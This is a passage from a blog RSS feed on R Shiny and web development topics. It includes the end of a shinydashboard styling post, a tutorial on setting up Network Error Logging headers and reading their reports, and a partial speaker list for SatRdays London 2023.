&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;includeCSS&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;www/styles.css&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now our input slider has gone from this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="An unstyled slider input. A slider for number of bedrooms going from\n0-8 which fills in blue and with a blue label showing the\nnumber." height="auto" id="h-rh-i-5" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/slider_no_style.png" width="876"&gt;&lt;/p&gt;
&lt;p&gt;To this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Slider input styled with brand colour. A slider for number of bedrooms\ngoing from 0-8 which fills in teal and with a teal label showing the\nnumber." height="auto" id="h-rh-i-6" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/slider_style.png" width="889"&gt;&lt;/p&gt;
&lt;p&gt;And our font from this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="{shinydashboard} with default font. Bay area rent prices and summary\nbox with default font styling." height="auto" id="h-rh-i-7" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/font_before.png" width="1377"&gt;&lt;/p&gt;
&lt;p&gt;To this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="{shinydashboard} with custom Prompt font. Bay Area rent prices with\nstyling as described with the CSS edits." height="auto" id="h-rh-i-8" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/font_after.png" width="1369"&gt;&lt;/p&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;There are many ways to customise a {shinydashboard} Shiny app. If you
are content with a few different colours, you can stick to the default
colour palettes, but if you want to use custom colours you should
consider using the {fresh} package. If you want full control of the look
and feel of your dashboard, you might want to consider learning CSS and
creating your own stylesheet! Although, if you wanted to create a very
custom-looking dashboard, you might be better off not using
{shinydashboard} at all…&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Network Error Logging - Important Insights</title><link>https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/</link><pubDate>Thu, 09 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the second in the series of blog posts about using server headers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;Content Security Policies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;Network Error Logging&lt;/a&gt; - this one!&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;Heads up! We&amp;rsquo;re about to launch WASP, a Web Application Security Platform. The aim of WASP is to help you manage (well, you guessed it) the security of your application using Content Security Policy and Network Error Logging. We&amp;rsquo;ll be chatting about it more in a full blog post nearer the time.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="what-is-network-error-logging"&gt;What is Network Error Logging?&lt;/h2&gt;
&lt;p&gt;At the time of writing, Network Error Logging (NEL) is still an experimental header from W3C. It&amp;rsquo;s a feature of most browsers that lets a website or application opt in to receiving reports from the browser about failed network fetches. Its aim is to let us, the developers, know when a user has failed to reach the application. For instance, NEL would have let W3C know that when I visited their &lt;a href="https://www.w3.org/TR/network-error-logging/" rel="external"&gt;Network Error Logging page&lt;/a&gt;, I received a 503&amp;hellip;&lt;/p&gt;
&lt;img src="w3c-network-error-logging.png" alt="Image of w3.org website not loading due to a 503 status code error." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h2 id="why-do-you-need-network-error-logging"&gt;Why do you need Network Error Logging?&lt;/h2&gt;
&lt;p&gt;Not being able to load your application (Shiny, R Markdown or Quarto, for example) due to a network failure is possibly the worst experience a user can have on your website (apart from XSS attacks or similar). To understand these errors, we need support from the browser. Why? Because this information never reaches the server, rendering the server metrics useless.&lt;/p&gt;
&lt;p&gt;Since we are setting Network Error Logging at the &lt;strong&gt;server&lt;/strong&gt; layer, we can gain additional insights
into how our application is functioning in real life. This level of detail is particularly important
now that we are able to quickly create Shiny dashboards, R Markdown &amp;amp; Quarto documents.
Once you throw in Posit Connect, you can generate a large amount of web content in a short
space of time.&lt;/p&gt;
&lt;h2 id="activating-the-report-to-header"&gt;Activating the Report-To header&lt;/h2&gt;
&lt;p&gt;There are two steps to activating NEL for your site. First, it requires the &lt;code&gt;Report-To&lt;/code&gt; header. We chatted a little bit about its predecessor, &lt;code&gt;report-uri&lt;/code&gt;, in the &lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/" rel="external"&gt;Content Security Policy blog&lt;/a&gt;. The &lt;code&gt;Report-To&lt;/code&gt; header allows us to specify groups of endpoints to use within the Content Security Policy and Network Error Logging headers. This means we can send our CSP and NEL reports to different endpoints for separate processing. An example &lt;code&gt;Report-To&lt;/code&gt; header would look like so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Report&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;To&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;group&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csp-endpoint&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;max_age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17280000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;endpoints&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;url&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/csp-reports&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;group&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;nel-endpoint&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;max_age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17280000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;endpoints&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;url&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/nel-reports&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this set-up, we&amp;rsquo;ve configured the browser to send reports to the endpoints for &lt;code&gt;17280000&lt;/code&gt; seconds (200 days). After this, you&amp;rsquo;ll have to re-issue the &lt;code&gt;Report-To&lt;/code&gt; header to begin receiving reports again.&lt;/p&gt;
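&lt;p&gt;On the wire, the value of &lt;code&gt;Report-To&lt;/code&gt; is a comma-separated list of JSON objects, one per group. As a minimal sketch (the helper names &lt;code&gt;buildReportTo&lt;/code&gt; and &lt;code&gt;secondsToDays&lt;/code&gt; are our own illustrations, not part of any library), the value above could be assembled in JavaScript along these lines:&lt;/p&gt;

```javascript
// Hypothetical helper: serialise endpoint groups into a Report-To header value.
// Each group becomes one JSON object; the objects are joined with commas.
function buildReportTo(groups) {
  return groups.map(function (group) {
    return JSON.stringify(group);
  }).join(", ");
}

// Convert a max_age given in seconds into days.
function secondsToDays(seconds) {
  return seconds / (60 * 60 * 24);
}

const maxAge = 17280000;

// The two endpoint groups from the example above
const groups = [
  {
    group: "csp-endpoint",
    max_age: maxAge,
    endpoints: [{ url: "https://jumpingrivers.com/csp-reports" }]
  },
  {
    group: "nel-endpoint",
    max_age: maxAge,
    endpoints: [{ url: "https://jumpingrivers.com/nel-reports" }]
  }
];

const reportTo = buildReportTo(groups);
console.log("Report-To: " + reportTo);
console.log(secondsToDays(maxAge) + " days"); // 200 days
```

&lt;p&gt;Wrapping the generated value in square brackets should give valid JSON, which is a handy sanity check before deploying the header.&lt;/p&gt;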
&lt;h2 id="activating-the-nel-header"&gt;Activating the NEL header&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;NEL&lt;/code&gt; header is pretty simple. There are only two required fields:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;report_to&lt;/code&gt;: The name of the endpoint group to send the NEL reports to.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;max_age&lt;/code&gt;: How long, in seconds, the browser should keep using the endpoint.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If we want to send NEL reports to the &lt;code&gt;nel-endpoint&lt;/code&gt; group, then our &lt;code&gt;NEL&lt;/code&gt; header looks like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;NEL&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;report_to&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;nel-endpoint&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;max_age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17280000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="the-report-format"&gt;The report format&lt;/h2&gt;
&lt;p&gt;Let&amp;rsquo;s say we&amp;rsquo;ve set NEL up on our website. A user trying to access a page on the website has received a 400 error code. The browser will send a POST request with &lt;code&gt;Content-Type: application/reports+json&lt;/code&gt; and a payload in a format similar to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;network-error&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;url&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/example&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;body&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;elapsed_time&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;354&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;method&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;phase&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;protocol&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;http/1.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;referrer&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/example&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sampling_fraction&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;server_ip&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;115.554.22.87&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;status_code&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;http.error&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The top-level &amp;ldquo;&lt;code&gt;body&lt;/code&gt;&amp;rdquo; key contains the actual network error report whilst the other top-level keys are meta info about the report. The meta info includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;age&lt;/code&gt; - The time, in ms, between the error being encountered and the browser sending the report.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;type&lt;/code&gt; - Type of report. Always &amp;ldquo;network-error&amp;rdquo; for NEL reports.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;url&lt;/code&gt; - The URL where the error occurred.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Within the body itself, there are a few important keys we should know about:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;referrer&lt;/code&gt; - This is the URL from which the user has come. If this and the top-level &lt;code&gt;url&lt;/code&gt; are the same, the error happened whilst the user was on the same page.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;status_code&lt;/code&gt; - The status code that the browser received from the server. In this case, it&amp;rsquo;s a 400.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;elapsed_time&lt;/code&gt; - The time, in ms, between the browser starting the request and completing or aborting it. For us, this is 354ms.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;type&lt;/code&gt; - The type of network error. See a full list of the error types &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Network_Error_Logging" rel="external"&gt;here&lt;/a&gt;. We&amp;rsquo;ve got &lt;code&gt;http.error&lt;/code&gt;, which means the browser successfully received a response, but it had a 4xx or 5xx status code.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;server_ip&lt;/code&gt; - The IP address of the server that the browser sent the request to.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that the report does not get sent as soon as the user gets the network error. The browser will batch reports and send them periodically. In addition, no information is kept about the end-user, just the network error.&lt;/p&gt;
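&lt;p&gt;To make the field descriptions concrete, here is a rough sketch of how a reporting endpoint might summarise an incoming payload. The function names &lt;code&gt;summariseReport&lt;/code&gt; and &lt;code&gt;summarisePayload&lt;/code&gt;, and the shape of their output, are our own assumptions for illustration. We also assume the payload arrives as a JSON array of reports, since the browser batches them:&lt;/p&gt;

```javascript
// Hypothetical helper: pull out the fields discussed above from one NEL report.
// receivedAt is the time (ms since epoch) at which our endpoint got the report.
function summariseReport(report, receivedAt) {
  const body = report.body;
  return {
    url: report.url,
    errorType: body.type,
    statusCode: body.status_code,
    elapsedMs: body.elapsed_time,
    // age is the delay between the error and the report being sent, so
    // subtracting it gives an approximate time for the error itself
    occurredAt: new Date(receivedAt - report.age).toISOString(),
    // identical referrer and url means the user was already on that page
    samePage: body.referrer === report.url
  };
}

// Keep only network error reports from a batched payload and summarise them.
function summarisePayload(payloadText, receivedAt) {
  return JSON.parse(payloadText)
    .filter(function (report) { return report.type === "network-error"; })
    .map(function (report) { return summariseReport(report, receivedAt); });
}

// A trimmed copy of the example report, wrapped in an array to mimic a batch
const payload = JSON.stringify([{
  age: 15,
  type: "network-error",
  url: "https://jumpingrivers.com/example",
  body: {
    elapsed_time: 354,
    referrer: "https://jumpingrivers.com/example",
    status_code: 400,
    type: "http.error"
  }
}]);

// An arbitrary receipt time, fixed here so the output is reproducible
const summaries = summarisePayload(payload, Date.UTC(2023, 2, 9, 12, 0, 0));
console.log(summaries);
```

&lt;p&gt;Filtering on the top-level &lt;code&gt;type&lt;/code&gt; is a defensive choice: if the same endpoint group were also used for other report types, they would be skipped rather than misread.&lt;/p&gt;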
&lt;hr&gt;
&lt;p&gt;Need help setting up Network Error Logging? Please get in &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023: Speakers</title><link>https://www.jumpingrivers.com/blog/satrdays-london-speakers/</link><pubDate>Tue, 07 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-speakers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-speakers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-speakers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays London is fast approaching, and we are happy to announce our full lineup of speakers for the event! Read on for more info. If you want to join the fun, head over to the &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; to sign up!&lt;/p&gt;
&lt;h3 id="keynote-speakers"&gt;Keynote Speakers&lt;/h3&gt;
&lt;h4 id="julia-silge---posit"&gt;Julia Silge - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Julia Silge is a data scientist and software engineer at Posit PBC (formerly RStudio) where she works on open source modeling and MLOps tools. She is an author, an international keynote speaker, and a real-world practitioner focusing on data analysis and machine learning. Julia loves text analysis, making beautiful charts, and communicating about technical topics with diverse audiences.&lt;/p&gt;
&lt;h4 id="oliver-hawkins---financial-times"&gt;Oliver Hawkins - &lt;a href="https://www.ft.com/" rel="external"&gt;Financial Times&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Oliver Hawkins works as an editorial data scientist for the visual and data journalism team at the Financial Times. He has previously worked as a statistical researcher and a data scientist for the House of Commons Library, and as a data journalist for the BBC. He is interested in statistics, machine learning and data visualisation.&lt;/p&gt;
&lt;h3 id="contributed-talks"&gt;Contributed talks&lt;/h3&gt;
&lt;h4 id="botan-ağın-and-michael-stevens---samknows"&gt;&lt;a href="https://www.linkedin.com/in/botanagin" rel="external"&gt;Botan Ağın&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/michael-stevens-55a523b0/" rel="external"&gt;Michael Stevens&lt;/a&gt; - &lt;a href="https://samknows.com/" rel="external"&gt;SamKnows&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;AutRmatic reporting: billions of internet measurements, hundreds of reports and one repository to rule them all&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;SamKnows has been pioneering internet performance measurements for over 14 years. The reason we exist is to provide a source of truth for how the internet is really performing. The data we collect can be used as a common language between government regulators, internet service providers, academics, and content providers to optimise and improve internet performance for everyone.&lt;/p&gt;
&lt;p&gt;Day to day SamKnows uses R to handle a huge range of automated and self-serve workloads. Keeping track of each report’s recipients, delivery schedule, dependencies and deployment procedure can be tricky, especially in the nightmare scenario of suddenly needing to migrate all of your jobs to a new server or cloud environment.&lt;/p&gt;
&lt;p&gt;In this presentation, we will talk about how we structure our regularly-scheduled reports as standardised entities within a monorepo. We will explain how this approach reduces the latency in setting up a report, makes it easier for new team members to contribute, and lets us uphold standards while retaining the flexibility to deliver work in diverse formats with a range of complexity levels and opportunities for manual intervention. We will go into detail on specific workflows that take the terabytes of data collected by SamKnows from cloud and on-premises data sources, process them into an R Markdown document, formatted spreadsheet, and raw CSV output, and distribute them through cloud file storage, FTP servers, email, Slack and more.&lt;/p&gt;
&lt;h4 id="vyara-apostolova-and-laura-cole---national-audit-office"&gt;&lt;a href="https://www.linkedin.com/in/vyara-apostolova-5a62a4136/" rel="external"&gt;Vyara Apostolova&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/laura-cole-7b7397123/" rel="external"&gt;Laura Cole&lt;/a&gt; - &lt;a href="https://www.nao.org.uk/" rel="external"&gt;National Audit Office&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;ScRutinising government spending&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;The National Audit Office supports Parliament in holding government to account both via its Financial Audit and Value for Money work. The Analysis Hub is a central team that utilises a range of analytical techniques to support both strands of work. The proposed presentation will showcase two examples of how we in the Analysis Hub use R to support our mission to hold government to account.&lt;/p&gt;
&lt;p&gt;We use R to reproduce complex models that departments employ to produce accounting estimates for their financial accounts. Our R reproductions allow us to assess if departments have implemented their selected methodology correctly and to highlight any model integrity issues. We also implement additional sensitivity testing, including via Monte Carlo simulations to capture the uncertainty around model outputs. The presentation will cover an overview of our approach and a demo of a reproduction of a dummy model.&lt;/p&gt;
&lt;p&gt;We have also built an R Shiny app, Covid-19 Cost tracker, that brings together data from across the UK government on the costs of measures in response to the Covid-19 pandemic. It is one of the very few sources of comprehensive information on Covid-19 related spending and the only one as an interactive tool. With it the public can examine spending by department and category of spend as well as interact with bubble graphs to explore the costs of individual policies. The presentation will include an overview of how the data analytics team and audit team collaborated to produce the output and a demo of the app.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="andrew-collier---fathom-data"&gt;&lt;a href="https://www.linkedin.com/in/datawookie/" rel="external"&gt;Andrew Collier&lt;/a&gt; - &lt;a href="https://www.fathomdata.dev/" rel="external"&gt;Fathom Data&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Dark Corners of the Tidyverse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;In the realm of the Tidyverse, there are functions which are always in the spotlight. These are the titans: well known and loved, frequently invoked and virtually indispensable. There are other, lesser-known functions which stand quietly in the shadows. Unacknowledged, somewhat obscure and almost forgotten. Waiting for their moment to shine.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ll talk about five of these Unsung Heroes of the Tidyverse, lauding their virtues and showing how they can help you succeed on your next Data Science quest.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="jack-davison---ricardo-energy--environment"&gt;&lt;a href="https://www.linkedin.com/in/jack-davison/" rel="external"&gt;Jack Davison&lt;/a&gt; - &lt;a href="https://www.ricardo.com/en/services/environmental-consulting" rel="external"&gt;Ricardo Energy &amp;amp; Environment&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;“Put it on a map!” – Developments in Air Quality Data Analysis&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;An understanding of air quality is crucial as it can have significant public health, environmental and economic effects. However, air quality data is complex, constantly changing in space and time, and influenced by a myriad of factors such as meteorology and human activity. This makes air quality analysis challenging, and communicating the results of this analysis more challenging still!&lt;/p&gt;
&lt;p&gt;Just over a decade ago, the {openair} package was authored to provide an open-source toolkit to help air quality practitioners get the most out of their data, and is still used widely in academia, consultancy and industry today. While {openair} itself has not changed hugely in recent years, much thought has been put into extending it through leveraging more recent tools and packages.&lt;/p&gt;
